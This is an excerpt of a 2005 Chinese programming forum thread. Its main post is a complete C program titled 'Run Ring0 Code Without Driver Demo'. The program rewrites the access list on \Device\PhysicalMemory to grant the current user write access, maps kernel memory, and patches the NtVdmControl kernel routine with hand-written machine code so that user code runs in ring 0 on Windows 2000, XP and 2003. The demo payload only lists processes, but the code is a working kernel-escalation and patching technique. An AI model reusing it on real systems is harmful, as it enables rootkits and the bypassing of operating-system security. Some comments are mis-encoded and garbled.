|
20楼#
发布于:2005-01-05 17:44
If the software built by VC++ and it will run under Windows. How to use your code? Can you give some example about VC++ implement with your code? Thanks!
|
|
|
21楼#
发布于:2005-01-05 20:07
I have already post the method that switch from 3 to 0 years ago ,you can search it on the net.
|
|
|
|
22楼#
发布于:2005-01-06 08:54
;;; ring3 --> ring0 switch C code
;;; From zzzEVAzzz idea #include <Windows.h> #include <Ntsecapi.h> #include <Aclapi.h> #pragma comment (lib,"ntdll.lib") // Copy From DDK #pragma comment (lib,"Kernel32.lib") #pragma comment (lib,"Advapi32.lib") //------------------ Data struct define --------------------// typedef struct _SYSTEM_MODULE_INFORMATION { ULONG Reserved[2]; PVOID Base; ULONG Size; ULONG Flags; USHORT Index; USHORT Unknown; USHORT LoadCount; USHORT ModuleNameOffset; CHAR ImageName[256]; } SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION; typedef struct _OBJECT_ATTRIBUTES { ULONG Length; HANDLE RootDirectory; PUNICODE_STRING ObjectName; ULONG Attributes; PVOID SecurityDescriptor; PVOID SecurityQualityOfService; } OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES; typedef enum _SECTION_INHERIT { ViewShare = 1, ViewUnmap = 2 } SECTION_INHERIT; typedef struct _MY_PROCESS_INFO { ULONG PID; ULONG KPEB; ULONG CR3; CHAR Name[16]; ULONG Reserved; } MY_PROCESS_INFO, *PMY_PROCESS_INFO; typedef long NTSTATUS; //------------------ data struct end --------------------// //--------------------- Predefine -----------------------// #define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0) #define STATUS_SUCCESS 0x00000000 #define STATUS_UNSUCCESSFUL 0xC0000001 #define STATUS_NOT_IMPLEMENTED 0xC0000002 #define STATUS_INFO_LENGTH_MISMATCH 0xC0000004 #define STATUS_INVALID_PARAMETER 0xC000000D #define STATUS_ACCESS_DENIED 0xC0000022 #define STATUS_BUFFER_TOO_SMALL 0xC0000023 #define OBJ_KERNEL_HANDLE 0x00000200 #define SystemModuleInformation 11 #define InitializeObjectAttributes( p, n, a, r, s ) { \ (p)->Length = sizeof( OBJECT_ATTRIBUTES ); \ (p)->RootDirectory = r; \ (p)->Attributes = a; \ (p)->ObjectName = n; \ (p)->SecurityDescriptor = s; \ (p)->SecurityQualityOfService = NULL; \ } //--------------------- -----------------------// //------------------ Native API decalre ------------------// NTSYSAPI VOID NTAPI RtlInitUnicodeString( PUNICODE_STRING DestinationString, PCWSTR SourceString ); NTSYSAPI NTSTATUS NTAPI ZwQuerySystemInformation( ULONG SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength ); NTSYSAPI NTSTATUS NTAPI ZwOpenSection( OUT PHANDLE SectionHandle, IN ACCESS_MASK DesiredAccess, IN POBJECT_ATTRIBUTES ObjectAttributes ); NTSYSAPI NTSTATUS NTAPI ZwMapViewOfSection( IN HANDLE SectionHandle, IN HANDLE ProcessHandle, IN OUT PVOID *BaseAddress, IN ULONG ZeroBits, IN ULONG CommitSize, IN OUT PLARGE_INTEGER SectionOffset OPTIONAL, IN OUT PULONG ViewSize, IN SECTION_INHERIT InheritDisposition, IN ULONG AllocationType, IN ULONG Protect ); NTSYSAPI NTSTATUS NTAPI ZwUnmapViewOfSection( IN HANDLE ProcessHandle, IN PVOID BaseAddress ); NTSYSAPI NTSTATUS NTAPI ZwClose( IN HANDLE Handle ); NTSYSAPI NTSTATUS NTAPI NtVdmControl( IN ULONG ControlCode, IN PVOID ControlData ); //------------------ ------ ------------------// //------------------ Global variable --------------------// NTSTATUS (NTAPI *pfnNtVdmControl)( IN ULONG ControlCode, IN PVOID ControlData ); BOOLEAN (NTAPI *pfnPsGetVersion)( PULONG MajorVersion OPTIONAL, PULONG MinorVersion OPTIONAL, PULONG BuildNumber OPTIONAL, PUNICODE_STRING CSDVersion OPTIONAL ); HANDLE (NTAPI *pfnPsGetCurrentProcessId)( ); PVOID (NTAPI *pfnMemcpy)( IN VOID UNALIGNED *Destination, IN CONST VOID UNALIGNED *Source, IN SIZE_T Length ); ULONG (_cdecl *pfnDbgPrint)( IN PCHAR Format, ... ); ULONG *pPsInitialSystemProcess; //------------------------------------------------// // Get the base of special module PVOID GetModuleBase(PCSTR name) { NTSTATUS status; PVOID pBuffer, pModule; ULONG nRetSize, i, n; PSYSTEM_MODULE_INFORMATION pmi; pBuffer = LocalAlloc(LPTR, 0x1000); if (NULL == pBuffer) { printf("LocalAlloc[0] Failed: %d\n", GetLastError()); return NULL; } status = ZwQuerySystemInformation(SystemModuleInformation, pBuffer, 0x1000, &nRetSize); if (STATUS_INFO_LENGTH_MISMATCH == status) { //little buffer,reclloate again LocalFree(pBuffer); pBuffer = LocalAlloc(LPTR, nRetSize); if (NULL == pBuffer) { printf("LocalAlloc[1] Failed: %d\n", GetLastError()); return NULL; } status = ZwQuerySystemInformation(SystemModuleInformation, pBuffer, nRetSize, &nRetSize); } if (!NT_SUCCESS(status)) { printf("ZwQuerySystemInformation Failed: %d\n", LsaNtStatusToWinError(status)); LocalFree(pBuffer); return NULL; } pmi = (PSYSTEM_MODULE_INFORMATION)((ULONG)pBuffer + 4); n = *(ULONG*)pBuffer; pModule = NULL; // search special module,get it's base address for (i=0; i<n; i++) { if (!_stricmp(pmi->ImageName+pmi->ModuleNameOffset, name)) { pModule = pmi->Base; break; } pmi++; } LocalFree(pBuffer); return pModule; } // get the read write handle of \Device\PhysicalMemory HANDLE OpenPhysicalMemory() { DWORD dwRet; NTSTATUS status; UNICODE_STRING name; OBJECT_ATTRIBUTES oa; EXPLICIT_ACCESS ea; PSECURITY_DESCRIPTOR pSD; PACL pDacl = NULL; PACL pNewDacl = NULL; HANDLE hSection = NULL; HANDLE hSectionRet = NULL; RtlInitUnicodeString(&name, L"\\Device\\PhysicalMemory"); InitializeObjectAttributes(&oa, &name, OBJ_KERNEL_HANDLE, NULL, NULL); // ÒԿɶÁдSectionȨÏÞ´ò¿ªPhysicalMemory status = ZwOpenSection(&hSectionRet, SECTION_MAP_READ | SECTION_MAP_WRITE, &oa); if (NT_SUCCESS(status)) goto FreeAndExit; // success,return directly if (status != STATUS_ACCESS_DENIED) { // error printf("ZwOpenSection[0] Failed: %d\n", LsaNtStatusToWinError(status)); hSectionRet = NULL; goto FreeAndExit; } // enable PhysicalMemory by read/write enable ACP status = ZwOpenSection(&hSection, READ_CONTROL | WRITE_DAC, &oa); if (!NT_SUCCESS(status)) { printf("ZwOpenSection[1] Failed: %d\n", LsaNtStatusToWinError(status)); goto FreeAndExit; } // get DACL of PhysicalMemory dwRet = GetSecurityInfo(hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL, &pDacl, NULL, &pSD); if (dwRet != ERROR_SUCCESS) { printf("GetSecurityInfo Failed: %d\n", dwRet); goto FreeAndExit; } // create an ACE,it's allow current user read/write PhysicalMemory ZeroMemory(&ea, sizeof(EXPLICIT_ACCESS)); ea.grfAccessPermissions = SECTION_MAP_READ | SECTION_MAP_WRITE; ea.grfAccessMode = GRANT_ACCESS; ea.grfInheritance = NO_INHERITANCE; ea.Trustee.TrusteeForm = TRUSTEE_IS_NAME; ea.Trustee.TrusteeType = TRUSTEE_IS_USER; ea.Trustee.ptstrName = "CURRENT_USER"; // add new ACE to DACL dwRet = SetEntriesInAcl(1, &ea, pDacl, &pNewDacl); if (dwRet != ERROR_SUCCESS) { printf("SetEntriesInAcl Failed: %d\n", dwRet); goto FreeAndExit; } // newer DACL of physicalMemory dwRet = SetSecurityInfo(hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL, pNewDacl, NULL); if (dwRet != ERROR_SUCCESS) { printf("SetSecurityInfo Failed: %d\n", dwRet); goto FreeAndExit; } // enable read/write PhysicalMemory again status = ZwOpenSection(&hSectionRet, SECTION_MAP_READ | SECTION_MAP_WRITE, &oa); if (!NT_SUCCESS(status)) { printf("ZwOpenSection[2] Failed: %d\n", LsaNtStatusToWinError(status)); goto FreeAndExit; } FreeAndExit: if (pSD) LocalFree(pSD); if (pNewDacl) LocalFree(pNewDacl); if (hSection) ZwClose(hSection); return hSectionRet; } // Shadow physical memory to current procedure user address PVOID MapPhysicalMemory(HANDLE hSection, // ÎïÀíÄÚ´æµÄSection¾ä±ú ULONG Offset, // Ó³ÉäÆðʼƫÒÆÁ¿£¬Ïà¶ÔÓÚÎïÀíÄÚ´æµÄ0µØÖ? ULONG CommitSize // Ó³Éä?¶Î§ ) { NTSTATUS status; PVOID BaseAddress = NULL; LARGE_INTEGER PhysicalAddress = {Offset, 0}; SIZE_T ViewSize = CommitSize; status = ZwMapViewOfSection(hSection, (HANDLE)-1, &BaseAddress, 0, CommitSize, &PhysicalAddress, &ViewSize, ViewShare, 0, PAGE_READWRITE); if (!NT_SUCCESS(status)) { printf("ZwMapViewOfSection Failed: %d\n", LsaNtStatusToWinError(status)); return NULL; } return BaseAddress; } // Ring0 code.Demo how toget every procedure's PID,KPEB,CR3 and ImageName NTSTATUS Ring0Code(ULONG size, PULONG buffer) { ULONG BuildNumber; ULONG ListOffset; ULONG PIDOffset; ULONG NameOffset; PLIST_ENTRY ListHead, ListPtr; PMY_PROCESS_INFO mypi; pfnDbgPrint("Run in Ring0!\n"); // out put debug information pfnPsGetVersion(NULL, NULL, &BuildNumber, NULL); pfnDbgPrint("BuildNumber = %d\n", BuildNumber); switch (BuildNumber) // every os hase special KPEB { case 2195: // Win2000 ListOffset = 0xa0; PIDOffset = 0x9c; NameOffset = 0x1fc; break; case 2600: // WinXP ListOffset = 0x88; PIDOffset = 0x84; NameOffset = 0x174; break; case 3790: // Win2003 ListOffset = 0x88; PIDOffset = 0x84; NameOffset = 0x154; break; default: return STATUS_NOT_IMPLEMENTED; } if (size<4) return STATUS_BUFFER_TOO_SMALL; size -= 4; if (NULL == buffer) return STATUS_INVALID_PARAMETER; *buffer = 0L; // mypi = (PMY_PROCESS_INFO)(buffer + 1); // search ActiveProcessLinks ListHead = ListPtr = (PLIST_ENTRY)(*pPsInitialSystemProcess + ListOffset); while (ListPtr->Flink != ListHead) { if (size < sizeof(MY_PROCESS_INFO)) return STATUS_BUFFER_TOO_SMALL; mypi->KPEB = (ULONG)ListPtr - ListOffset; mypi->PID = *(ULONG*)(mypi->KPEB + PIDOffset); mypi->CR3 = *(ULONG*)(mypi->KPEB + 0x18); pfnMemcpy(mypi->Name, (PVOID)(mypi->KPEB + NameOffset), 16); (*buffer)++; mypi++; size -= sizeof(MY_PROCESS_INFO); ListPtr = ListPtr->Flink; } return STATUS_SUCCESS; } // diplay procedure infomation void ListProcessInfo(PULONG buffer) { ULONG i, n = *buffer; PMY_PROCESS_INFO mypi = (PMY_PROCESS_INFO)(buffer + 1); printf(" PID KPEB CR3 Name\n" " ---- -------- -------- ----\n"); for (i=0; i<n; i++) { printf(" %-4d %08x %08x %s\n", mypi->PID, mypi->KPEB, mypi->CR3, mypi->Name); mypi++; } } void main() { char *Kernel = "ntoskrnl.exe"; PVOID pKernel = NULL; HMODULE hKernel = NULL; HANDLE hSection = NULL; char *mapping = NULL; PVOID buffer = NULL; ULONG offset; NTSTATUS status; char OrigCode[24], HookCode[24] = "\xE8\xFF\xFF\xFF\xFF" // call 0xffffffff ;nt!PsGetCurrentProcessId "\x3D\xEE\xEE\xEE\xEE" // cmp eax, 0xeeeeeeee ;×Ô¼ºµÄPID "\x75\x05" // jne $+5 "\xE9\xDD\xDD\xDD\xDD" // jmp 0xdddddddd ;Ring0Code "\xB8\x01\x00\x00\xC0" // mov eax, 0xc0000001 ;STATUS_UNSUCCESSFUL "\xC3"; // ret printf("\n -=< Run Ring0 Code Without Driver Demo >=-\n\n"); // get the base of system kernel ntoskrnl.exe pKernel = GetModuleBase(Kernel); if (NULL == pKernel) return; if ((ULONG)pKernel < 0x80000000 || (ULONG)pKernel > 0x9FFFFFFF) { // Module base override dirctly memory shadow address printf("Error: Kernel module base (%08x) is out of range.\n", pKernel); return; } // hKernel = LoadLibrary(Kernel); if (NULL == hKernel) { printf("LoadLibrary Failed: %d\n", GetLastError()); return; } // »ñÈ¡ÄÚºËÀý³Ì/±äÁ¿ÔÚÓû§Ì¬µÄÏà¶ÔλÖà if ((pfnMemcpy = (PVOID)GetProcAddress(hKernel, "memcpy")) && (pfnDbgPrint = (PVOID)GetProcAddress(hKernel, "DbgPrint")) && (pfnNtVdmControl = (PVOID)GetProcAddress(hKernel, "NtVdmControl")) && (pfnPsGetVersion = (PVOID)GetProcAddress(hKernel, "PsGetVersion")) && (pfnPsGetCurrentProcessId = (PVOID)GetProcAddress(hKernel, "PsGetCurrentProcessId")) && (pPsInitialSystemProcess = (PVOID)GetProcAddress(hKernel, "PsInitialSystemProcess"))); else { printf("GetProcAddress Failed: %d\n", GetLastError()); goto FreeAndExit; } //get the real address of kernle procedure/variable offset = (ULONG)pKernel - (ULONG)hKernel; (ULONG)pfnMemcpy += offset; (ULONG)pfnDbgPrint += offset; (ULONG)pfnNtVdmControl += offset; (ULONG)pfnPsGetVersion += offset; (ULONG)pfnPsGetCurrentProcessId += offset; (ULONG)pPsInitialSystemProcess += offset; // set HookCode *(ULONG*)(HookCode+1) = (ULONG)pfnPsGetCurrentProcessId - (ULONG)pfnNtVdmControl - 5; *(ULONG*)(HookCode+6) = GetCurrentProcessId(); *(ULONG*)(HookCode+13) = (ULONG)Ring0Code - (ULONG)pfnNtVdmControl - 17; // open physical memory Section hSection = OpenPhysicalMemory(); if (NULL == hSection) goto FreeAndExit; // shadow NtVdmControl offset = (ULONG)pfnNtVdmControl & 0x1FFFF000; // switch to physical memory mapping = MapPhysicalMemory(hSection, offset, 0x2000); if (NULL == mapping) goto FreeAndExit; // ±£´æNtVdmControlÈë¿Ú´úÂë offset = (ULONG)pfnNtVdmControl & 0x00000FFF; // offset in page memcpy(OrigCode, mapping+offset, 24); buffer = LocalAlloc(LPTR, 0x1000); if (NULL == buffer) { printf("LocalAlloc Failed: %d\n", GetLastError()); goto FreeAndExit; } memcpy(mapping+offset, HookCode, 24); // hook NtVdmControl status = NtVdmControl(0x1000, buffer); // invoke NtVdmControl£¬enter Ring0 memcpy(mapping+offset, OrigCode, 24); // restore NtVdmControl entry if (!NT_SUCCESS(status)) { printf("NtVdmControl Failed: %d\n", LsaNtStatusToWinError(status)); goto FreeAndExit; } ListProcessInfo(buffer); FreeAndExit: if (buffer != NULL) LocalFree(buffer); if (mapping != NULL) ZwUnmapViewOfSection(hSection, mapping); if (hSection != NULL) ZwClose(hSection); if (hKernel != NULL) FreeLibrary(hKernel); } |
|
上一页
下一页